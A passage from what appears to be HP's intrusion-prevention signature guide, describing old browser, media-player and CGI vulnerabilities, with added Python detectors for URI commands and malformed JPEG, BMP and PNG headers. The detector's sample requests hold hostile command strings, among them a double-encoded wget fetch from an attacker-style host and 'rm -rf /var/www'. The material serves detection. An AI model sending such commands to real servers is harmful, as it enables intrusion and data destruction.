vulnerable to a stack-based buffer overflow in its NTLM authentication code: a malicious server that wget connects to
can send an overly long NTLM username and execute arbitrary code on the client. This rule generates an event when
the wget pattern is sent to an HTTP server. The issue is fixed in wget 1.10.2; administrators are advised to upgrade to
1.10.2 or a later version to resolve it.
Signature ID: 945
Xterm command attempt
Threat Level: Warning
Industry ID: CVE-2007-2797 Bugtraq: 26710
Signature Description: This rule generates an event when an "xterm" command is used over a plain-text connection on
one of the specified web ports to the target web server. The "xterm" command may be used to establish an interactive
shell session to the machine. The presence of the "xterm" command in the URI indicates that an attacker attempted to
trick the web server into executing system commands in non-interactive mode.
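Signature IDs 935 through 945 all match on a command name carried in the request URI. The following Python is an added example of that matching, not code from the HP guide or the TMS zl module, whose rule syntax the guide does not publish. The regexes, the bounded double-decoding, the tightened rm pattern (it requires an argument, which the page's bare "rm" match does not) and the sample request lines are all assumptions made for this demo.

```python
"""Added example (not HP's code): flag the command names Signature IDs 935-945
look for in the URI of a client-to-server HTTP request line. The regexes and
sample requests are constructed for this demo."""
import re
from urllib.parse import unquote

# One regex per signature, applied to the decoded URI. Word boundaries keep
# 'ping' from matching 'mapping'; the rm pattern additionally requires an
# argument (an assumption that tightens the page's bare "rm" match).
COMMAND_PATTERNS = {
    "perl":       r"\bperl\b",
    "ping":       r"\bping\b",
    "/bin/ps":    r"/bin/ps\b",
    "python":     r"\bpython\b",
    "rm":         r"\brm\s+-?\S",
    "tclsh":      r"\btclsh\b",
    "tftp":       r"\btftp\b",
    "traceroute": r"\btraceroute\b",
    "uname":      r"\buname\b",
    "wget":       r"\bwget\b",
    "xterm":      r"\bxterm\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in COMMAND_PATTERNS.items()}


def decode_uri(raw_uri, max_rounds=3):
    """Percent-decode repeatedly (bounded) so %2577get cannot hide 'wget'; '+' becomes a space."""
    decoded = raw_uri
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("+", " ")


def match_commands(request_line):
    """Return the pattern names present in the request-URI of one HTTP request line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    uri = decode_uri(parts[1])
    return [name for name, rx in COMPILED.items() if rx.search(uri)]


# Constructed sample traffic for the demo (not captured data).
SAMPLE_REQUESTS = [
    "GET /cgi-bin/search.cgi?q=test HTTP/1.1",                               # benign
    "GET /cgi-bin/run.cgi?cmd=uname+-a HTTP/1.1",                            # uname (943)
    "GET /cgi-bin/run.cgi?cmd=%2Fbin%2Fps%20-ef HTTP/1.1",                   # /bin/ps, single-encoded (937)
    "GET /cgi-bin/run.cgi?cmd=%2577get%2520http://evil.example/x HTTP/1.1",  # wget, double-encoded (944)
    "GET /cgi-bin/run.cgi?cmd=rm+-rf+/var/www HTTP/1.1",                     # rm (939)
    "GET /forms/rm/index.html HTTP/1.1",                                     # 'rm' as a path segment: no event
    "GET /cgi-bin/run.cgi?cmd=xterm+-display+10.0.0.5:0 HTTP/1.1",           # xterm (945)
]


def scan(requests=SAMPLE_REQUESTS):
    """Map each request line to the list of patterns it triggers (empty = no event)."""
    return {req: match_commands(req) for req in requests}


if __name__ == "__main__":
    for req, hits in scan().items():
        label = ", ".join(hits) or "-"
        print(f"{label:<12} {req}")
```

As with the signatures themselves, a hit only says the token was present in the URI; it says nothing about whether the server executed anything, so these events are a starting point for looking at the server's own logs, not proof of compromise.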
Signature ID: 1000
Mozilla JavaScript URL Arbitrary Cookie Access Vulnerability
Threat Level: Warning
Bugtraq: 5293
Signature Description: Mozilla is an open source web browser available for a number of platforms, including
Microsoft Windows and Linux. Mozilla 0.9.2 is vulnerable to a cookie access vulnerability. Successful exploitation
allows an attacker to gain access to sensitive cookie data, including authentication credentials. This rule generates an
event when the cookie-access pattern is sent to an HTTP server. This vulnerability is fixed in Mozilla 1.1;
administrators are advised to upgrade to 1.1 or a later version to resolve it.
Signature ID: 1001
JavaScript document.domain execution vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0815 Bugtraq: 5346
Signature Description: Implementations of JavaScript in multiple browsers on multiple platforms contain an error that
may lead to a user inadvertently running JavaScript code of the attacker's choice. Microsoft Internet Explorer 6 and prior
versions and Mozilla 1.0 and prior versions are vulnerable. These browsers may allow a remote web server to access
HTTP and SOAP/XML content from restricted sites by mapping the malicious server's parent DNS domain name to the
restricted site, loading a page from the restricted site into one frame, and passing the information to the attacker-controlled frame, which is allowed because the document.domain of the two frames matches on the parent domain.
Patches are available at the vendors' web sites.
Signature ID: 1002
Microsoft Extended Metafile in URI Vulnerability
Threat Level: Warning
Bugtraq: 9707
Signature Description: Microsoft Internet Explorer (MSIE), commonly abbreviated IE, is a series of graphical web
browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems. Microsoft
Windows XP Professional SP1 and prior versions are vulnerable: Windows Explorer on these versions may be prone
to multiple memory corruption vulnerabilities, including a heap-based overflow and an integer overflow, in the
metafile processing code. A malformed header may cause a denial of service condition, and it may also be possible
for an attacker to execute code of their choice on a vulnerable host.
Signature ID: 1004
Symantec Norton AntiSpam 2004 LaunchCustomRuleWizard buffer overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0363 Bugtraq: 9916
Signature Description: Symantec AntiSpam with AntiVirus makes e-mail more secure and productive, providing
enterprises with advanced antispam and e-mail threat defense plus antivirus protection (powered by the Symantec
AntiVirus engine). Symantec Norton AntiSpam 2004 is vulnerable to a stack-based buffer overflow in the
SymSpamHelper ActiveX component (symspam.dll), as used in Norton Internet Security 2004, which allows remote
attackers to execute arbitrary code via a long parameter to the LaunchCustomRuleWizard method.
Signature ID: 1005
OUTLOOK EML gain access Vulnerability
Threat Level: Information
Signature Description: Outlook Express is designed to give users access to their e-mail messages by dialing in to an
Internet Service Provider. It provides full support for all popular mail standards such as SMTP, POP3, IMAP, LDAP,
S/MIME and HTML. This rule triggers when a request for a .eml file is seen. An EML file can contain encoded
attachments (graphics, files, etc.), and all recovered or repaired messages are saved as .eml files. An attacker can use
this to gain unauthorized access.
Signature ID: 1006
RealOne Player SMIL File Script Execution vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0726 CVE-2004-2371 Bugtraq: 9738,8453
Signature Description: RealOne Player is a cross-platform media player by RealNetworks that plays a number of
multimedia formats including MP3, MPEG-4, Windows Media, and multiple versions of the proprietary RealAudio and
RealVideo formats. RealOne Player Gold for Windows 6.0.10.505 and prior versions are vulnerable: they allow
remote attackers to execute arbitrary script in the "My Computer" zone via a specially crafted Synchronized
Multimedia Integration Language (SMIL) file that causes the player to load a series of arbitrary URLs. If one of the
URLs contains scripting code, the player executes it in the context of the previous URL. Patches are available at the
Real web site.
Signature ID: 1007
XMLHttpRequest mishandling HTTP redirect vulnerability
Threat Level: Information
Industry ID: CVE-2002-0354 Bugtraq: 4628
Signature Description: The XMLHttpRequest object (XMLHTTP) in Netscape 6.1 and Mozilla 0.9.7 allows remote
attackers to read arbitrary files and list directories on a client system by opening a URL that redirects the browser to the
file on the client, then reading the result using the responseText property.
Signature ID: 1008
Microsoft Internet Explorer Header Local Resource Access via Location: HTTP Response
Header vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0549 Bugtraq: 10472
Signature Description: Microsoft Internet Explorer 5.01 SP4 and prior versions are vulnerable. The cross-domain
security model that Internet Explorer implements ensures that browser windows under the control of different web
sites cannot interfere with each other or access each other's data, while allowing windows from the same site to
interact with each other. Internet Explorer uses this model to maintain separation between browser frames from
different sources. A remotely exploitable cross-domain vulnerability exists in Internet Explorer. The Location
response-header field is used to redirect the recipient to a location other than the Request-URI for completion of the
request or identification of a new resource. An attacker can configure a web server to send a delayed 3xx redirect
whose Location points to a resource on the client's system in the Local Machine Zone, which causes that file to open
once the page is visited. An attacker could exploit this vulnerability by hosting the malicious web page on a web site
or by sending it to a victim as an HTML e-mail. Combined with a second vulnerability, the Modal Dialog Zone
Bypass, JavaScript can be executed within the victim's "My Computer" security zone. Administrators are advised to
install the updates mentioned in MS04-025.
Signature ID: 1009
Autoload readme.eml
Threat Level: Severe
Signature Description: This event indicates an attempt to load and run readme.eml, which is used as an infection vector
by the Nimda worm. The Nimda worm affects Microsoft Windows systems and attempts to spread via e-mail, network
shares and Microsoft IIS servers. A compromised server will attempt to spread and infect other vulnerable hosts.
Signature ID: 1010
Nimda-infected web server readme.eml file vulnerability
Threat Level: Information
Signature Description: Nimda is a computer worm that caused traffic slowdowns as it rippled across the Internet,
spreading by four different methods and infecting computers running Microsoft's web server, Internet Information
Server (IIS), as well as users who opened an e-mail attachment; the traffic it generates also amounts to a denial of
service. This rule triggers when an infected HTML page is served: the JavaScript appended to the page causes the
browser to download and execute README.EML. The worm writes README.EML, a multipart message carrying
the MIME-encoded worm, into the same directory as the web content it finds and appends a small JavaScript snippet
to the end of those files.
Signature ID: 1011
Microsoft Internet Explorer File Name Spoofing Vulnerability using CLSID File Extension
Threat Level: Warning
Industry ID: CVE-2004-0420 Bugtraq: 9510
Signature Description: The Windows Shell application programming interface (API) supports associating a class
identifier (CLSID) with a file type, and a CLSID used in place of a file extension is enough for the Windows Shell to
launch the associated application, just as a normal extension would. Files that Internet Explorer cannot handle itself
are offered for saving to disk or opening with a known application, chosen by extension association, through a dialog
box. Internet Explorer mishandles filenames that contain multiple dots: it displays the filename up to the last period
but saves the file with the extension that follows the last period, so a file it cannot handle is not saved with its real
extension. An attacker exploits this by spoofing a filename consisting of a dot, a CLSID, a '%2e' and an innocuous
extension such as 'mpeg', for example 'abc.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}malware%2empeg'. The
attacker places this filename in the Content-Disposition field of the HTTP response header and convinces the user to
follow a malicious link. Because Internet Explorer cannot display the data, it shows a download dialog in which the
%2e has been URL-decoded to a dot, so the user believes they are downloading or opening a file of the displayed type
(an MPEG in the example). Once the user opens the file, the malicious content executes because the CLSID in the
filename selects the application. Administrators are advised to install the updates mentioned in MS04-024.
Signature ID: 1012
Microsoft Windows GDI+ Library JPEG File Parsing Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0200 Bugtraq: 11173 Nessus: 14834,14818,14724
Signature Description: Microsoft Windows Graphics Device Interface (GDI+) is an application programming interface
(API) that gives programmers the ability to display information on screens and printers. A remotely exploitable
buffer overflow vulnerability exists in the JPEG parsing component of GDI+ (Gdiplus.dll). A JPEG file is composed
of multiple sections, each starting with a two-byte section marker followed by a two-byte length field, which counts
its own two bytes, and then the section data. The comment marker (0xFFFE) introduces a section used to store
comments about the JPEG file. When the length of the comment section is given as 0x0000 or 0x0001, GDI+
subtracts the two length bytes without checking, so the computed data length underflows to a very large value and the
library tries to copy that many bytes, resulting in a heap overflow. This vulnerability can be exploited by constructing
a specially crafted JPEG file and convincing the victim to open it with one of the affected components that use GDI+
to parse JPEG files. Administrators are advised to install the updates mentioned in MS04-028.
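The length-underflow condition above is easy to check for in a file scanner or a decoder front-end. The following Python is an added example written for this guide entry, not code from HP or from GDI+; the constructed byte strings are minimal marker sequences rather than real images, and the walker deliberately stops at SOS because entropy-coded scan data, not marker segments, follows it.

```python
"""Added example (not HP's code): walk the marker segments of a JPEG and report
any COM (0xFFFE) segment whose length field is 0 or 1, the malformed case that
GDI+ mishandled (MS04-028). The byte strings are constructed fragments."""
import struct

SOI, EOI, SOS, COM = 0xFFD8, 0xFFD9, 0xFFDA, 0xFFFE
# Markers that carry no length field: SOI, EOI, TEM and the RSTn restart markers.
STANDALONE = {SOI, EOI, 0xFF01} | set(range(0xFFD0, 0xFFD8))


def walk_segments(data):
    """Yield (marker, length_or_None, offset) for each segment up to SOS or EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(data):
        marker, = struct.unpack(">H", data[pos:pos + 2])
        if marker >> 8 != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}, got {marker:#06x}")
        if marker in STANDALONE:
            yield marker, None, pos
            pos += 2
            if marker == EOI:
                return
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated length field")
        length, = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, length, pos
        if marker == SOS or length < 2:
            return          # SOS: scan data follows; length < 2: cannot advance safely
        pos += 2 + length   # the length counts its own two bytes but not the marker


def malformed_comment_offsets(data):
    """Offsets of COM segments with length 0 or 1.

    A decoder computes data_len = length - 2; for 0 or 1 that underflows to a
    huge unsigned value, which is the copy size that overflowed the GDI+ heap.
    """
    return [off for marker, length, off in walk_segments(data)
            if marker == COM and length is not None and length < 2]


# Constructed samples: SOI, one COM segment ("abc"), EOI.
GOOD_JPEG = b"\xff\xd8" + b"\xff\xfe" + struct.pack(">H", 5) + b"abc" + b"\xff\xd9"
BAD_JPEG = b"\xff\xd8" + b"\xff\xfe" + struct.pack(">H", 1) + b"abc" + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob in (("good", GOOD_JPEG), ("bad", BAD_JPEG)):
        print(name, malformed_comment_offsets(blob))
```

The same check applies to every marker that carries a length field, not only COM; the GDI+ bug was specific to the comment handler, which is why the signature and this example single it out.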
Signature ID: 1013
Microsoft ANI file parsing overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1049 Bugtraq: 12095
Signature Description: On Microsoft Windows platforms, the LoadImage API routine is used to load an image from a
file; it is part of the USER32 library. Microsoft Windows NT Server 4.0 SP6 and prior versions and Microsoft
Windows XP Professional SP1 and prior versions are vulnerable, as are all versions of Windows XP prior to Service
Pack 2. A lack of input validation on user-supplied input to the LoadImage routine allows an integer overflow to
occur, leading to a heap-based buffer overflow. It can be exploited through a web site using a maliciously crafted
animated cursor (ANI) file, and successful exploitation allows execution of arbitrary code. Patches are available from
Microsoft.
Signature ID: 1014
Mozilla GIF heap overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0399 Bugtraq: 12881
Signature Description: The Graphics Interchange Format (GIF) image decoding library shared by several Mozilla
products contains a heap overflow flaw. Firefox before 1.0.2, Mozilla before 1.7.6 and Thunderbird before 1.0.2 use
the same library and are all vulnerable. The flaw allows remote attackers to execute arbitrary code via a GIF image
with a crafted Netscape extension 2 block: the block carries a 32-bit buffer-size integer that is used to determine the
image buffer space, and an attacker who misrepresents this value can overflow the heap. Patches are available at the
respective vendor web sites.
Signature ID: 1015
Microsoft Windows Media Player PNG Image Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2004-1244 Bugtraq: 12485
Signature Description: The Portable Network Graphics (PNG) format is an established image standard and is well
supported in applications that view images. Microsoft Windows Media Player version 9 (when running on Windows
2000, Windows XP SP1 and SP2, or Windows Server 2003), Microsoft MSN Messenger 6.1 and 6.2, Windows 98,
Windows 98 SE and Windows ME are vulnerable to a buffer overflow caused by improper handling of PNG files. A
PNG image consists of a PNG header followed by a sequence of "chunks" (the PNG specification defines 18 chunk
types); each type of chunk conveys some specific information about the image. A remote attacker could create a
specially crafted PNG image with a large width or height value in the IHDR chunk to overflow a buffer and execute
arbitrary code on the system with the privileges of the user. Users are advised to install the updates mentioned in
MS05-009. This signature matches on the IHDR pattern and then checks the one-byte value at relative offset 8 after
it (the bit-depth field).
Signature ID: 1016
Microsoft Windows Media Player PNG Image Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2004-1244 Bugtraq: 12485
Signature Description: Same Windows Media Player PNG buffer overflow as Signature ID 1015 (CVE-2004-1244,
MS05-009): a specially crafted PNG image whose IHDR chunk carries a large width or height value overflows a
buffer and can execute arbitrary code with the privileges of the user. This signature matches on the IHDR pattern and
then checks the four-byte value at relative offset 4 after it (the height field).
Signature ID: 1017
Microsoft Windows Media Player PNG Image Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2004-1244 Bugtraq: 12485
Signature Description: Same Windows Media Player PNG buffer overflow as Signature ID 1015 (CVE-2004-1244,
MS05-009): a specially crafted PNG image whose IHDR chunk carries a large width or height value overflows a
buffer and can execute arbitrary code with the privileges of the user. This signature matches on the IHDR pattern and
then checks the four-byte value at relative offset 0 after it (the width field).
Signature ID: 1020
Directory Traversal Attempt Using Content-Disposition Filename Parameter vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0228 Bugtraq: 7517
Signature Description: Windows Media Player is a digital media player and media library application developed by
Microsoft, used for playing audio and video and viewing images on personal computers running the Microsoft
Windows operating system. Windows Media Player 7.1 and Windows Media Player for Windows XP are vulnerable;
these versions allow remote attackers to execute arbitrary code. The player downloads skins over HTTP, and an
attacker can execute arbitrary code via a skin file served from a URL containing hex-encoded backslash characters
(%5C), which causes an executable to be placed in an arbitrary location. Content-Disposition is a MIME header that
allows a file to be saved under the name given in its filename parameter. This rule triggers when the filename
parameter contains a sequence similar to ../ or ..\, which indicates a directory traversal attempt. Patches are available
from Microsoft.
Signature ID: 1021
Microsoft Internet Explorer Bitmap Image File Integer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2004-0566 CVE-2004-1922 Bugtraq: 9663,10097
Signature Description: Windows Internet Explorer, commonly abbreviated IE, is a series of graphical web browsers
developed by Microsoft. Internet Explorer on Windows 2000 is vulnerable to an integer overflow while processing a
BMP image file. A bitmap image always starts with the two fixed characters 'BM'. bfOffBits, a four-byte field in the
bitmap file header, specifies the byte offset from the beginning of the file at which the bitmap data starts.
MSHTML.DLL in Internet Explorer parses the BMP file and stores bfOffBits as a signed integer. A specially crafted
BMP file with bfOffBits set to a large value such as 2^31 or more therefore causes an integer overflow while Internet
Explorer processes the file. An attacker could exploit this vulnerability by hosting the malicious file on a web site or
by sending it to a victim as an HTML e-mail. Successful exploitation allows a remote attacker to execute arbitrary
code on a vulnerable system. Administrators are advised to install the updates mentioned in MS04-025.
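The signed-versus-unsigned mistake in bfOffBits is simple to demonstrate on the 14-byte BITMAPFILEHEADER. The following Python is an added example, not code from HP, Microsoft or the TMS module; the finding names, the make_bmp helper and the constructed headers are assumptions for the demo, and the check against the supplied data length stands in for the validation a correct parser must do before seeking to the pixel data.

```python
"""Added example (not HP's code): parse the BITMAPFILEHEADER and show how a
bfOffBits value of 2^31 or more reads as negative when stored in a signed
32-bit integer, the bug behind the MSHTML BMP integer overflow (MS04-025).
The headers below are constructed for the demo."""
import struct

# bfType, bfSize, bfReserved1, bfReserved2, bfOffBits (all little-endian)
FILE_HEADER = struct.Struct("<2sIHHI")


def parse_file_header(data):
    """Return the bfSize and bfOffBits fields; raise on a non-BMP prefix."""
    if len(data) < FILE_HEADER.size:
        raise ValueError("short header")
    bf_type, bf_size, _r1, _r2, bf_offbits = FILE_HEADER.unpack_from(data)
    if bf_type != b"BM":
        raise ValueError("not a BMP (missing 'BM' magic)")
    return {"bfSize": bf_size, "bfOffBits": bf_offbits}


def as_signed32(value):
    """Reinterpret an unsigned 32-bit value the way a C 'int' would hold it."""
    return struct.unpack("<i", struct.pack("<I", value))[0]


def check_offbits(data):
    """Return findings for the file header (empty list = plausible).

    'signed-negative': bfOffBits >= 2^31, so a parser that keeps it in a signed
        int sees a negative offset (the MSHTML mistake).
    'beyond-data': bfOffBits points past the bytes actually supplied, which a
        correct parser rejects (as an unsigned comparison) before seeking.
    """
    hdr = parse_file_header(data)
    findings = []
    if as_signed32(hdr["bfOffBits"]) < 0:
        findings.append("signed-negative")
    if hdr["bfOffBits"] > len(data):
        findings.append("beyond-data")
    return findings


def make_bmp(bf_offbits, pixel_bytes=b"\x00" * 4):
    """Constructed BMP: 14-byte file header, 12-byte BITMAPCOREHEADER, 1x1 24-bit pixel data."""
    core = struct.pack("<IHHHH", 12, 1, 1, 1, 24)   # bcSize, bcWidth, bcHeight, bcPlanes, bcBitCount
    total = FILE_HEADER.size + len(core) + len(pixel_bytes)
    return FILE_HEADER.pack(b"BM", total, 0, 0, bf_offbits) + core + pixel_bytes


GOOD_BMP = make_bmp(26)           # pixel data begins right after the two headers
BAD_BMP = make_bmp(0x80000000)    # 2^31: fits an unsigned field, negative as a signed int

if __name__ == "__main__":
    for name, blob in (("good", GOOD_BMP), ("bad", BAD_BMP)):
        off = parse_file_header(blob)["bfOffBits"]
        print(name, off, as_signed32(off), check_offbits(blob))
```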
Signature ID: 1022
Apple iTunes pls/m3u Playlist Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0043 Bugtraq: 12238
Signature Description: Apple iTunes is a digital media player available for the Microsoft Windows and Mac OS X
operating systems. It supports a variety of playlist formats, including .m3u and .pls; a playlist lets a user organize the
order in which media files are played, and in addition to media files, URLs to digital streams can be included. Apple
iTunes 4.7 is vulnerable to a buffer overflow in the way it parses URL entries in .m3u and .pls playlist files. An
attacker could exploit this vulnerability by constructing a specially crafted playlist containing a very long URL to
execute arbitrary code. To do so the attacker would need to convince a user to open the malicious playlist file with
the vulnerable version. Patches are available from Apple.
Signature ID: 1023
Internet Explorer PNG Image Rendering Component Buffer Overflow Vulnerability/Libpng
Graphics Library Large tRNS Chunk Buffer Overflow vulnerability
Threat Level: Severe
Industry ID: CVE-2004-0597 CVE-2005-1211 Bugtraq: 13941,10857
Signature Description: The Portable Network Graphics (PNG) format is an established image standard and is well
supported in applications that view images. Microsoft's PNG filter library is a multi-purpose implementation of PNG
rendering used by applications such as Internet Explorer. The PNG image rendering component of Microsoft Internet
Explorer (pngfilt.dll) does not properly handle PNG image files, potentially allowing a buffer overflow to occur. A
PNG image consists of a PNG header followed by a sequence of "chunks" (the PNG specification defines 18 chunk
types); each type of chunk conveys some specific information about the image. A remote attacker could create a
specially crafted PNG image with a large tRNS chunk to overflow a buffer and execute arbitrary code on the system.
If a user opens such an image with a vulnerable version of Internet Explorer, the attacker may be able to execute
arbitrary code with the privileges of the user or cause Internet Explorer to terminate. Administrators are advised to
install the updates mentioned in MS05-025. Libpng is a portable reference library for PNG used on Unix and other
platforms; libpng versions 1.2.5 and prior are affected by the same kind of tRNS chunk overflow (CVE-2004-0597).
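The IHDR checks under Signature IDs 1015, 1016 and 1017 and the tRNS length check under this entry all reduce to walking the chunk list. The following Python is an added example that does both, written for this guide, not code from HP, Microsoft, libpng or the TMS module. The limits MAX_DIMENSION (the specification's 2^31-1 bound) and MAX_TRNS_LEN (256, the most palette entries a tRNS chunk can describe), the finding names and the hand-built PNG samples are assumptions for the demo; the chunk-building helper exists only to construct those samples.

```python
"""Added example (not HP's code): walk PNG chunks and apply the checks under
Signature IDs 1015-1017 (IHDR width, height, bit depth) and 1023 (oversized
tRNS). Limits and sample images are constructed for the demo."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAX_DIMENSION = 2 ** 31 - 1      # PNG spec: width and height must be below 2^31
MAX_TRNS_LEN = 256               # palette tRNS carries at most 256 one-byte entries
VALID_BIT_DEPTHS = {1, 2, 4, 8, 16}


def iter_chunks(data):
    """Yield (type, payload, offset) for each chunk; stop after IEND."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        if len(payload) != length:
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        yield ctype, payload, pos
        pos += 12 + length           # length field + type + payload + CRC
        if ctype == b"IEND":
            return


def check_png(data):
    """Return finding names (empty list = passes every check)."""
    findings = []
    for ctype, payload, _off in iter_chunks(data):
        if ctype == b"IHDR":
            if len(payload) != 13:
                findings.append("ihdr-bad-length")
                continue
            # Relative to the "IHDR" tag: width at +0 (4 bytes), height at +4
            # (4 bytes), bit depth at +8 (1 byte): the offsets Signature IDs
            # 1017, 1016 and 1015 test respectively.
            width, height, depth = struct.unpack(">IIB", payload[:9])
            if not 0 < width <= MAX_DIMENSION:
                findings.append("ihdr-width")
            if not 0 < height <= MAX_DIMENSION:
                findings.append("ihdr-height")
            if depth not in VALID_BIT_DEPTHS:
                findings.append("ihdr-bit-depth")
        elif ctype == b"tRNS" and len(payload) > MAX_TRNS_LEN:
            findings.append("trns-oversized")   # the libpng / pngfilt.dll overflow case
    return findings


def chunk(ctype, payload):
    """Build one chunk with a correct CRC (used only to construct the samples)."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def ihdr(width, height, depth=8, color_type=2):
    return chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, depth, color_type, 0, 0, 0))


# Constructed samples (no IDAT; the checks above never need pixel data).
GOOD_PNG = PNG_SIG + ihdr(1, 1) + chunk(b"IEND", b"")
WIDE_PNG = PNG_SIG + ihdr(0xFFFFFFFF, 1) + chunk(b"IEND", b"")
TRNS_PNG = (PNG_SIG + ihdr(1, 1, 8, 3) + chunk(b"PLTE", b"\x00" * 3)
            + chunk(b"tRNS", b"\x00" * 1024) + chunk(b"IEND", b""))

if __name__ == "__main__":
    for name, blob in (("good", GOOD_PNG), ("wide", WIDE_PNG), ("trns", TRNS_PNG)):
        print(name, check_png(blob) or "clean")
```

Both limits sit above anything a legitimate file can contain, so a hit is not a false positive on an odd but valid image; a decoder that enforces them before allocating has no buffer to overflow.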
Signature ID: 1024
Microsoft Internet Explorer Object Tag Type Property Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0344 Bugtraq: 7806
Signature Description: Microsoft Internet Explorer versions 5.01, 5.5 and 6.0 are vulnerable to a buffer overflow
through the 'Type' property of the 'Object' tag. The 'Object' tag is used to insert objects such as ActiveX components
into HTML pages, and its 'Type' property sets or retrieves the MIME type of the object, such as 'text/plain' or
'application/hta'. The length check on the buffer for the Type property can be bypassed when the value includes '/'
characters: each '/' is expanded to the three characters '_/_' while copying, but the length check is done before the
expansion. Because of this expansion the buffer overflows, allowing execution of arbitrary code. An attacker could
create an HTML file that includes a malicious OBJECT tag to execute arbitrary code on the victim's machine. When a
victim using a vulnerable version of IE, or another application that uses IE as its HTML interpreter, opens the
malicious file (via a web page, e-mail message, file sharing, etc.), the attacker-supplied code executes. Microsoft has
addressed this issue in security bulletin MS03-020.
Signature ID: 1025
NullSoft Winamp IN_CDDA.dll File Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1119 Bugtraq: 11730 Nessus: 15817
Signature Description: Winamp is a media player for Microsoft Windows developed by Nullsoft. Winamp version
5.05 and earlier are vulnerable to a stack-based buffer overflow caused by improper bounds checking of .cda entries
within a .m3u or .pls playlist file. The vulnerability exists in the IN_CDDA.dll library, where Winamp handles CDDA
entries contained in playlist files: Winamp copies the filename in a CDDA (.cda) media path into a 16-byte buffer
without first checking its size. By supplying an overly long .cda file name, a remote attacker can overflow the buffer
when Winamp processes the file. By convincing a user to open a specially crafted playlist file, a remote
unauthenticated attacker may be able to execute arbitrary code; this can also be achieved with a specially crafted web
page or other HTML document that launches Winamp without any user interaction. Versions 5.0.1 through 5.0.6 are
also reported vulnerable. Users are advised to install a newer version of Winamp, available from the Winamp web
site.
Signature ID: 1026
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0823 Bugtraq: 4857
Signature Description: The HTML Help ActiveX control provides a rich feature set for help systems, including an
expanding table of contents, keyword search, shortcuts and pop-up help topics. The control is one of the authoring
components that ships with Microsoft HTML Help. Microsoft Windows XP Professional and prior versions, and
Microsoft Windows NT Workstation 4.0 SP6a and prior versions, are vulnerable. These versions allow remote
attackers to execute arbitrary code via an HTML document that calls the HTML Help ActiveX control (HHCtrl.ocx)
with a long pathname in the Item parameter. No remedy is available.
Signature ID: 1027
HTTP /cgi-bin Directory Access Vulnerability
Threat Level: Information
Signature Description: cgi-bin is the directory that holds CGI scripts and programs, usually written in Perl or Unix
shell. Access to the /cgi-bin/ directory could allow an attacker to gather sensitive information about, and execute
inappropriate commands through, the CGI applications running on a web server. This rule generates an event when
the /cgi-bin/ directory is requested.
Signature ID: 1028
/cgi-dos/ HTTP access Vulnerability
Threat Level: Information
Signature Description: A web server is a program that accepts HTTP requests from clients and serves HTTP responses,
optionally with data content. O'Reilly's WebSite Pro is such a web server. This rule detects possible unauthorized
access to the CGI application running on the web server by detecting /cgi-dos/ content in the URI. Successful
exploitation can allow an attacker to access batch files and then execute arbitrary commands.
Signature ID: 1029
AHG Search Engine Search.CGI Arbitrary Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-2113 Bugtraq: 3985
Signature Description: AHG HTMLsearch is a search engine that searches HTML pages in the local directory tree and
returns a list of links to the pages where the entered keyword(s) are found. Search.CGI is a component of the
HTMLsearch search engine software distributed by AHG. AHG HTMLsearch 1.0 does not properly validate
user-supplied input to the search.cgi script, so a remote attacker can send a crafted URL containing arbitrary
commands separated by semicolon (;) or pipe (|) characters to execute arbitrary commands on the web server. No
remedy was available as of August 2008.
Signature ID: 1030
AT-generated.cgi web access vulnerability
Threat Level: Information
Industry ID: CVE-1999-1072
Signature Description: This rule detects possible execution of arbitrary code or unauthorized access to the CGI
application running on the web server by detecting /AT-generated.cgi content in the URI. Excite for Web Servers
(EWS) 1.1 is prone to this vulnerability.
Signature ID: 1031
AlienForm2 CGI directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0934 Bugtraq: 4983 Nessus: 11027
Signature Description: AlienForm2, developed by Jon Hedley, is a web-form-to-e-mail gateway written in Perl.
AlienForm2 version 1.5 is vulnerable and could allow a remote attacker to traverse directories on the web server. A
remote attacker sends a crafted URL request to the af.cgi script containing modified "dot dot" sequences (such as
.|.%2F) to traverse directories and manipulate arbitrary files on the server: view any file, append arbitrary data to an
existing file, or write arbitrary data to a new file. This can disclose sensitive system information that an attacker may
use to further compromise the system. No remedy was available as of August 2008.
Signature ID: 1032
Aplio Internet Phone Arbitrary Command Execution Vulnerability
Threat Level: Warning
